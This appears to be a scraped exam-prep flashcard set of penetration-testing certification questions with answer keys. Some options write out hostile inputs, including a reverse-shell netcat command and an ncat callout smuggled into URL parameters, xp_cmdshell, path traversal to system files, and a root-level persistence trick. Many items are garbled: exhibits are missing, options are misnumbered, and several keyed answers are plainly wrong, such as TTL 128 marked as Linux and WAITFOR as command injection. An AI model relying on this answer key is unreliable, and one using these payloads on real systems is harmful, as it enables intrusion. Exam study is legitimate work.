Dump 3 Flashcards by TheKake Unknown

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a
shell. However, a connection was not established, and no errors were shown on the payload
execution. The penetration tester suspected that a network device, like an IPS or next-generation
firewall, was dropping the connection. Which of the following payloads are MOST likely to
establish a shell successfully?

A.
windows/x64/meterpreter/reverse_tcp
B.
windows/x64/meterpreter/reverse_http
C.
windows/x64/shell_reverse_tcp
D.
windows/x64/powershell_reverse_tcp
E.
windows/x64/meterpreter/reverse_https

Answer: E

How well did you know this?

Not at all

Perfectly

A penetration tester has been hired to examine a website for flaws. During one of the time
windows for testing, a network engineer notices a flood of GET requests to the web server,
reducing the website’s response time by 80%. The network engineer contacts the penetration
tester to determine if these GET requests are part of the test. Which of the following BEST
describes the purpose of checking with the penetration tester?

A.
Situational awareness
B.
Rescheduling
C.
DDoS defense
D.
Deconfliction

Answer: D

How well did you know this?

Not at all

Perfectly

Which of the following is the BEST resource for obtaining payloads against specific network
infrastructure products?

A.
Exploit-DB
B.
Metasploit
C.
Shodan
D.
Retina

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester gives the following command to a systems administrator to execute on one of
the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

A.
To trick the systems administrator into installing a rootkit
B.
To close down a reverse shell
C.
To remove a web shell after the penetration test
D.
To delete credentials the tester created

Answer: C

How well did you know this?

Not at all

Perfectly

The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line
numbers would define the array?

A.
Line 8
B.
Line 13
C.
Line 19
D.
Line 20

Answer: B

How well did you know this?

Not at all

Perfectly

A company provided the following network scope for a penetration test:

169.137.1.0/24
221.10.1.0/24
149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and
exploited the system. Later, the tester learned that this particular IP address belongs to a third
party. Which of the following stakeholders is responsible for this mistake?

A.
The company that requested the penetration test
B.
The penetration testing company
C.
The target host’s owner
D.
The penetration tester
E.
The subcontractor supporting the test

Answer: A

How well did you know this?

Not at all

Perfectly

In an unprotected network file repository, a penetration tester discovers a text file containing
usernames and passwords in cleartext and a spreadsheet containing data for 50 employees,
including full names, roles, and serial numbers. The tester realizes some of the passwords in the
text file follow the format: <name-serial_number>. Which of the following would be the best action
for the tester to take NEXT with this information?</name-serial_number>

A.
Create a custom password dictionary as preparation for password spray testing.
B.
Recommend using a password manager/vault instead of text files to store passwords securely.
C.
Recommend configuring password complexity rules in all the systems and applications.
D.
Create a TPM-backed sealed storage location within which the unprotected file repository can be
reported.

Answer: A

How well did you know this?

Not at all

Perfectly

During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

A.
Linux
. NetBSD
B.
Windows
C.
macOS

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester joins the assessment team in the middle of the assessment. The client has
asked the team, both verbally and in the scoping document, not to test the production networks.
However, the new tester is not aware of this request and proceeds to perform exploits in the
production environment. Which of the following would have MOST effectively prevented this
misunderstanding?

A.
Prohibiting exploitation in the production environment
B.
Requiring all testers to review the scoping document carefully
C.
Never assessing the production networks
D.
Prohibiting testers from joining the team during the assessment

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester is using the following script:

Which of the following BEST describes the purpose of this script?

A.
To determine if a web server’s date/time function is susceptible to attack
B.
To determine if a web server’s time zone has been misconfigured
C.
To determine the difference between local and server time
D.
To determine and display the round-trip time of HTTP requests

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from
the target machine. Which of the following MOST likely caused the attack to fail?

A.
The injection was too slow.
B.
The DNS information was incorrect.
C.
The DNS cache was not refreshed.
D.
The client did not receive a trusted response.

Answer: D

How well did you know this?

Not at all

Perfectly

During an assessment, a penetration tester was able to access the organization’s wireless
network from outside of the building using a laptop running Aircrack-ng. Which of the following
should be recommended to the client to remediate this issue?

A.
Changing to Wi-Fi equipment that supports strong encryption
B.
Using directional antennae
C.
Using WEP encryption
D.
Disabling Wi-Fi

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester is conducting a penetration test and discovers a vulnerability on a web server
that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell.
Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?

A.
Close the reverse shell the tester is using.
B.
Note this finding for inclusion in the final report.
C.
Investigate the high numbered port connections.
D.
Contact the client immediately.

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN
100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the
penetration tester now wants the local interface of the attacker machine to have a static ARP entry
in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63
Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to
establish a static ARP entry successfully?

A.
tcpdump -i eth01 arp and arp[6:2] == 2
B.
arp -s 192.168.1.63 60-36-DD-A6-C5-33
C.
ipconfig /all findstr /v 00-00-00 | findstr Physical
D.
route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Answer: B

How well did you know this?

Not at all

Perfectly

During an internal penetration test against a company, a penetration tester was able to navigate to
another part of the network and locate a folder containing customer information such as
addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following
should the company have implemented to BEST protect this data?

A.
Vulnerability scanning
B.
Network segmentation
C.
System hardening
D.
Intrusion detection

Answer: B

How well did you know this?

Not at all

Perfectly

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the
following commands would be the BEST option when stealth is not a concern and the task is time
sensitive?

A.
Nmap -s 445 -Pn -T5 172.21.0.0/16
B.
Nmap -p 445 -n -T4 -open 172.21.0.0/16
. Nmap -sV –script=smb* 172.21.0.0/16
C.
Nmap -p 445 -max -sT 172. 21.0.0/16

Answer: B

How well did you know this?

Not at all

Perfectly

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the
following tools would be BEST to use to analyze this issue?

A.
Peach
B.
WinDbg
C.
GDB
D.
OllyDbg

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester found several critical SQL injection vulnerabilities during an assessment of a
client’s system. The tester would like to suggest mitigation to the client as soon as possible.
Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

A.
Closing open services
B.
Encryption users’ passwords
C.
Randomizing users’ credentials
D.
Users’ input validation
E.
Parameterized queries
F.
Output encoding

Answer: D,E

How well did you know this?

Not at all

Perfectly

Which of the following is a rules engine for managing public cloud accounts and resources?

A.
Cloud Custodian
B.
Cloud Brute
C.
Pacu
D.
Scout Suite

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester will be performing a vulnerability scan as part of the penetration test on a
client’s website. The tester plans to run several Nmap scripts that probe for vulnerabilities while
avoiding detection. Which of the following Nmap options will the penetration tester MOST likely
utilize?

A.
-8 -T0
B.
–script “httpvuln”
C.
-sn
D.
-O -A

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester discovered that a client uses cloud mail as the company’s email system.
During the penetration test, the tester set up a fake cloud mail login page and sent all company
employees an email that stated their inboxes were full and directed them to the fake login page to
remedy the issue. Which of the following BEST describes this attack?

A.
Credential harvesting
B.
Privilege escalation
C.
Password spraying
D.
Domain record abuse

Answer: A

How well did you know this?

Not at all

Perfectly

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the
target company’s website and then creates a list of possible usernames based on the email
address format. Which of the following types of attacks would MOST likely be used to avoid
account lockout?

A.
Mask
B.
Rainbow
C.
Dictionary
D.
Password spraying

Answer: D

How well did you know this?

Not at all

Perfectly

Which of the following is the activity that is typically required the MOST during the postengagement
cleanup phase?

A.
Removing shells
B.
Launching new attacks
C.
Documenting vulnerabilities
D.
Requesting payment

Answer: A

How well did you know this?

Not at all

Perfectly

Which of the following tools should a penetration tester use to crawl a website and build a wordlist
using the data recovered to crack the password on the website?

A.
DirBuster
B.
CeWL
C.
w3af
D.
Patator

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog: http://company.com/catalog.asp?productid=22 The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes: http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05' Which of the following should the penetration tester attempt NEXT? A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami' B. http://company.com/catalog.asp?productid=22' OR 1=1 -- C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 -- D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Answer: B

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform? A. A vulnerability scan B. A WHOIS lookup C. A packet capture D. An Nmap scan

Answer: D

After running the enum4linux.pl command, a penetration tester received the following output: Which of the following commands should the penetration tester run NEXT? A. smbspool //192.160.100.56/print$ B. net rpc share -S 192.168.100.56 -U '' C. smbget //192.168.100.56/web -U '' D. smbclient //192.168.100.56/web -U '' -N

Answer: D

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT? A. Badge cloning B. Watering-hole attack C. Impersonation D. Spear phishing

Answer: D

Which of the following compliance requirements would be BEST suited in an environment that processes credit card data? A. PCI DSS B. ISO 27001 C. SOX D. GDPR

Answer: A

A penetration tester successfully infiltrated the targeted web server and created credentials with administrative privileges. After conducting data exfiltration, which of the following should be the tester’s NEXT step? A. Determine what data is available on the web server. B. Change or delete the logs. C. Log out and migrate to a new session. D. Log in as the new user.

Answer: D

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted? A. SQL injection B. HTML injection C. Remote command injection D. DLL injection

Answer: C

Given the following code: Which of the following data structures is systems? A. A tuple B. A tree C. An array D. A dictionary

Answer: D

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability? A. Network segmentation B. Key rotation C. Encrypted passwords D. Patch management

Answer: D

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept? A. Statement of work B. Program scope C. Non-disclosure agreement D. Rules of engagement

Answer: D

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials? A. Use Patator to pass the hash and Responder for persistence. B. Use Hashcat to pass the hash and Empire for persistence. C. Use a bind shell to pass the hash and WMI for persistence. D. Use Mimikatz to pass the hash and PsExec for persistence.

Answer: D

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the: A. NDA B. SLA C. MSA D. SOW

Answer: A

A penetration tester created the following script to use in an engagement: Which of the following is the reason for the error? A. The sys variable was not defined. B. The argv variable was not defined. C. The sys module was not imported. D. The argv module was not imported.

Answer: C

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity? A. /var/log/messages B. /var/log/last_user C. /var/log/user_log D. /var/log/lastlog

Answer: D

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website? A. WHOIS domain lookup B. Job listing and recruitment ads C. SSL certificate information D. Public data breach dumps

Answer: A

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine? A. Wireshark B. EAPHammer C. Kismet D. Aircrack-ng

Answer: D

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task? A. Wireshark B. Gattacker C. tcpdump D. Netcat

Answer: B

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.) A. Cross-site scripting B. Server-side request forgery C. SQL injection D. Log poisoning E. Cross-site request forgery F. Command injection

Answer: D,F

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test? A. Add a web shell to the root of the website. B. Upgrade the reverse shell to a true TTY terminal. C. Add a new user with ID 0 to the /etc/passwd file. D. Change the password of the root user and revert after the test.

Answer: C

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place? A. To provide protection against host OS vulnerabilities B. To reduce the probability of a VM escape attack C. To fix any misconfigurations of the hypervisor D. To enable all features of the hypervisor

Answer: A

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.) A. Setting up a secret management solution for all items in the source code management system B. Implementing role-based access control on the source code management system C. Configuring multifactor authentication on the source code management system D. Leveraging a solution to scan for other similar instances in the source code management system E. Developing a secure software development life cycle process for committing code to the source F. Creating a trigger that will prevent developers from including passwords in the source code management system

Answer: A,D

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment? A. The web server is using a WAF. B. The web server is behind a load balancer. C. The web server is redirecting the requests. D. The local antivirus on the web server is rejecting the connection.

Answer: A

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information? A. Follow the established data retention and destruction process. B. Report any findings to regulatory oversight groups. C. Publish the findings after the client reviews the report. D. Encrypt and store any client information for future analysis.

Answer: A

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal? A. Using OpenVAS in default mode B. Using Nessus with credentials C. Using Nmap as the root user D. Using OWASP ZAP

Answer: B

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers? A. Redact identifying information and provide a previous customer's documentation. B. Allow the client to only view the information while in secure spaces. C. Determine which reports are no longer under a period of confidentiality. D. Provide raw output from penetration testing tools.

Answer: C

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information: Which of the following lines of code should the security engineer add to make the attack successful? A. window.location.= 'https://evilcorp.com' B. crossDomain: true C. geturlparameter ('username') D. redirectUrl = 'https://example.com'

Answer: B

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully? A. The IP address is wrong. B. The server is unreachable. C. The IP address is on the blocklist. D. The IP address is on the allow list.

Answer: C

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? A. A list B. A tree C. A dictionary D. An array

Answer: C

A penetration tester uncovered a flaw in an online banking web application that allows arbitrary requests to other internal network assets through a server-side request forgery. Which of the following would BEST reduce the risk of attack? A. Implement multifactor authentication on the web application to prevent unauthorized access of the application. B. Configure a secret management solution to ensure attackers are not able to gain access to confidential information. C. Ensure a patch management system is in place to ensure the web server system is hardened. D. Sanitize and validate all input within the web application to prevent internal resources from being accessed. E. Ensure that enhanced logging is enabled on the web application to detect the attack.

Answer: D

Which of the following actions would BEST explain why a testing team would need to reach out to a customer's emergency contact during an assessment? A. To confirm assessment dates B. To escalate the detection of a prior compromise C. To submit the weekly status report D. To announce that testing will begin

Answer: B

An executive needs to use Wi-Fi to connect to the company's server while traveling. Looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive MOST likely experiencing? A. Data modification B. Amplification C. Captive portal D. Evil twin

Answer: D

A penetration tester calls an IT employee and pretends to be the financial director of the company. The penetration tester asks the IT employee to reset the financial director's email password. The penetration tester claims to be at an ongoing, off-site meeting with some investors and needs a presentation file quickly downloaded from the director's mailbox. Which of following techniques is the penetration tester trying to utilize? (Choose two.) A. Scarcity B. Intimidation C. Authority D. Consensus E. Urgency F. Familiarity

Answer: C,E

A penetration tester runs the following command: dig @ dns01.comptia.local axfr comptia.local If successful, which of the following types of information would be provided? A. The DNSSEC certificate and CA B. The DHCP scopes and ranges used on the network C. The hostnames and IP addresses of internal systems D. The OS and version of the DNS server

Answer: C

A company recruited a penetration tester to configure intrusion detection over the wireless network. Which of the following tools would BEST resolve this issue? A. Aircrack-ng B. Wireshark C. Cowpatty D. Kismet

Answer: D

While performing an assessment on a web application, a penetration tester notices the web browser creates the following request when clicking on the stock status for an item: POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://stock.shop.com:8080/product/stock/check%3FproductId%3D6%26storeId%3D1 Which of the following types of attacks would the penetration tester most likely try NEXT? A. Cross-site scripting B. Command injection C. Local file inclusion D. Server-side request forgery

Answer: D

When accessing the URL http://192.168.0.1/validate/user.php, a penetration tester obtained the following output: Which of the following is the MOST probable cause for this output? A. Lack of code signing B. Incorrect command syntax C. Insufficient error handling D. Insecure data transmission

Answer: C

Which of the following is the MOST secure method for sending the penetration test report to the client? A. Host it on an online storage system. B. Put it inside a password-protected ZIP file. C. Transfer it via webmail using an HTTPS connection. D. Use the client's public key.

Answer: D

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder: /home/user/scripts Which of the following commands should the penetration tester use to perform this scan? A. nmap --resume "not intrusive" B. nmap --script default,safe C. nmap --script /home/user/scripts D. nmap --load /home/user/scripts

Answer: C

Within a Python script, a line that states print (var) outputs the following: [{'1' : 'CentOS', '2' : 'Ubuntu'}, {'1' : 'Windows 10', '2' : 'Windows Server 2016'}] Which of the following objects or data structures is var? A. An array B. A class C. A dictionary D. A list

Answer: D

A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." Which of the following audiences was this message intended? A. Systems administrators B. C-suite executives C. Data privacy ombudsman D. Regulatory officials

Answer: B

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files: <% String id = request.getParameter("id"); %> Employee ID: <%= id %> Which of the following is the BEST remediation to prevent a vulnerability from being exploited, based on this code? A. Parameterized queries B. Patch application C. Output encoding D. HTML sanitization

Answer: C

Which of the following best describes why a client would hold a lessons-learned meeting with the penetration-testing team? A. To provide feedback on the report structure and recommend improvements B. To discuss the findings and dispute any false positives C. To determine any processes that failed to meet expectations during the assessment D. To ensure the penetration-testing team destroys all company data that was gathered during the test

Answer: C

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest. INSTRUCTIONS Select the tool the penetration tester should use for further investigation. Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

The tool the penetration tester should use for the further investigation is WPScan The two entries in the robots.txt file that the penetration tester should recommend for removal are 14 Allow: /admin 15 Allow: /wp-admin

Which of the following factors would a penetration tester MOST likely consider when testing at a location? A. Determine if visas are required. B. Ensure all testers can access all sites. C. Verify the tools being used are legal for use at all sites. D. Establish the time of the day when a test can occur.

Answer: D

A penetration tester who is performing a physical assessment has achieved physical access to a call center for the assessed company. The tester is able to move freely around the room. Which of the following attack types is most likely to result in the tester obtaining personal or confidential information quickly? A. Dumpster diving B. Warwalking C. Vishing D. Smishing E. Shoulder surfing

Answer: E

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would best enable the tester to perform phishing in a later stage of the assessment? A. Test for RFC-defined protocol conformance. B. Attempt to brute force authentication to the service. C. Perform a reverse DNS query and match to the service banner. D. Check for an open relay configuration.

Answer: D

A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform FIRST? A. Check the strength of the encryption settings. B. Determine if security tokens are easily available. C. Run a vulnerability check against the hypervisor. D. Scan the containers for open ports.

Answer: D

Given the following script: Which of the following describes True? A. A while loop B. A conditional C. A Boolean operator D. An arithmetic operator

Answer: B

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective? A. nmap -F 192.168.5.5 B. nmap -datalength 2 192.168.5.5 C. nmap -D 0.5.2.2 192.168.5.5 D. nmap -scanflags SYNFIN 192.168.5.5

Answer: D

A penetration tester is validating whether input validation mechanisms have been implemented in a web application. Which of the following should the tester use to determine whether the application is vulnerable to path traversal attacks? A. GET /image?filename-..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts B. GET /image?filename=lefitfe;pwd C. POST /image?filename - D. POST /image?filename =yhtak;ncat --ssl 192.168.0.1 2222

Answer: A

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the password 123change. Which of the following techniques is the penetration tester using? A. Brute-force attack B. LDAP injection C. Password spraying D. Kerberoasting

Answer: C

A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing? A. Public code repositories associated with a developer who previously worked for the target company B. Public code repositories associated with the target company's organization C. Private code repositories associated with the target company's organization D. Private code repositories associated with a developer who previously worked for the target company

Answer: B

Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten? A. NIST SP 800-53 B. ISO 27001 C. PCI DSS D. GDPR

Answer: D

A penetration tester developed the following script to be used during an engagement: However, when the penetration tester ran the script, the tester received the following message: socket.gaierror: [Errno -2] Name or service not known Which of the following changes should the penetration tester implement to fix the script?

Answer: A

A penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for the target company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking equipment. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely NEXT step for the penetration tester? A. Alert the target company of the discovered information. B. Verify the discovered information is correct with the manufacturer. C. Scan the equipment and verify the findings. D. Return to the dumpster for more information.

Answer: A

A penetration tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the MOST effective way for the tester to achieve this objective? A. Dropping USB flash drives around the company campus with the file on it B. Attaching the file in a phishing SMS that warns users to execute the file or they will be locked out of their accounts C. Sending a pretext email from the IT department before sending the download instructions later D. Saving the file in a common folder with a name that encourages people to click it

Answer: C

Which of the following documents describes activities that are prohibited during a scheduled penetration test? A. MSA B. NDA C. ROE D. SLA

Answer: C

While performing the scanning phase of a penetration test, the penetration tester runs the following command: nmap -n -vv -sV -p- 10.10.10.23-28 After the Nmap scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try NEXT? A. -sU B. -Pn C. -sn D. -sS

Answer: B

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester MOST likely utilize? A. Wireshark B. Netcat C. Nmap D. Ettercap

Answer: D

A penetration tester executes the following Nmap command and obtains the following output: Which of the following commands would BEST help the penetration tester discover an exploitable service? A. nmap -v -p 25 --script smtp-enum-users remotehost B. nmap -v --script=mysql-info.nse remotehost C. nmap --script=smb-brute.nse remotehost D. nmap -p 3306 --script "http*vuln*" remotehost

Answer: A

During enumeration, a red team discovered that an external web server was frequented by employees. After compromising the server, which of the following attacks would BEST support compromising company systems? A. A side-channel attack B. A command injection attack C. A watering-hole attack D. A cross-site scripting attack

Answer: C

A penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and features, but they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be used by each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example? A. Conditional B. Library C. Dictionary D. Subapplication

Answer: B

Which of the following tools would be BEST suited to perform a cloud security assessment? A. OpenVAS B. Scout Suite C. Nmap D. ZAP E. Nessus

Answer: B

During the assessment of a client's cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the provided onpremises credentials. Which of the following BEST describes why the tester was able to gain access? A. Federation misconfiguration of the container B. Key mismanagement between the environments C. IaaS failure at the provider D. Container listed in the public domain

Answer: A

A penetration tester wrote the following script on a compromised system: Which of the following would explain using this script instead of another tool? A. The typical tools could not be used against Windows systems. B. The configuration required the penetration tester to not utilize additional files. C. The Bash script will provide more thorough output. D. The penetration tester wanted to persist this script to run on reboot.

Answer: B

During an assessment, a penetration tester Inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below: Which of the following vulnerabilities was the attacker trying to exploit? A. Session hijacking B. URL manipulation C. SQL injection D. Insecure direct object reference

Answer: D

During a routine penetration test of a customer’s physical data center, a penetration tester observes that no changes have been made to the production firewalls in more than five years. Which of the following is the most appropriate remediation technique to reduce the risk of future security breaches? A. Video surveillance B. Biometric controls C. Password encryption D. SSH key rotation

Answer: D

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands: curl http://169.254.169.254/latest Which of the following attacks is the penetration tester more likely trying to perform? A. Metadata service attack B. Container escape techniques C. Credential harvesting D. Resource exhaustion

Answer: A

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients: nmap –sX –T4 –p 21-25, 67, 80, 139, 8080 192.168.11.191 The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate? A. All of the ports in the target range are closed. B. Nmap needs more time to scan the ports in the target range. C. The ports in the target range cannot be scanned because they are common UDP ports. D. All of the ports in the target range are open.

Answer: A

In Java and C/C++, variable initialization is critical because: A. the unknown value, when used later, will cause unexpected behavior. B. the compiler will assign null to the variable, which will cause warnings and errors. C. the initial state of the variable creates a race condition. D. the variable will not have an object type assigned to it.

Answer: A

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output: Which of the following should the penetration tester include in the report? A. Old, insecure ciphers are in use. B. The 3DES algorithm should be deprecated. C. 2,048-bit symmetric keys are incompatible with MD5. D. This server should be upgraded to TLS 1.2.

Answer: A

A penetration tester is reviewing the security of a web application running in an IaaS compute instance. Which of the following payloads should the tester send to get the running process credentials? A. file=http://192.168.1.78?+document.cookie B. file=../../../proc/self/environ C. file=’%20or%2054365=54365;–– D. file=http://169.254.169.254/latest/meta-data/

Answer: B

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user workstations. Which of the following should be included in the recommendations for remediation? A. Start a training program on proper access to the web server. B. Build a patch-management program for the web server. C. Place the web server in a screened subnet D. Implement endpoint protection on the workstations.

Answer: C

In a wireless network assessment, penetration testers would like to discover and gather information about accessible wireless networks in the target area. Which of the following is the most suitable method of finding this information? A. Token scoping B. RFID cloning C. Wardriving D. WAF detection E. Jamming

Answer: C

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference? A. OWASP B. MITRE ATT&CK C. PTES D. NIST

Answer: A

A penetration tester is performing an assessment against a customer’s web application that is hosted in a major cloud provider’s environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization’s WAF. Which of the following attacks would be most likely to succeed? A. Reflected XSS B. Brute-force C. DDoS D. Direct-to-origin

Answer: D

Dump 3 Flashcards

(100 cards)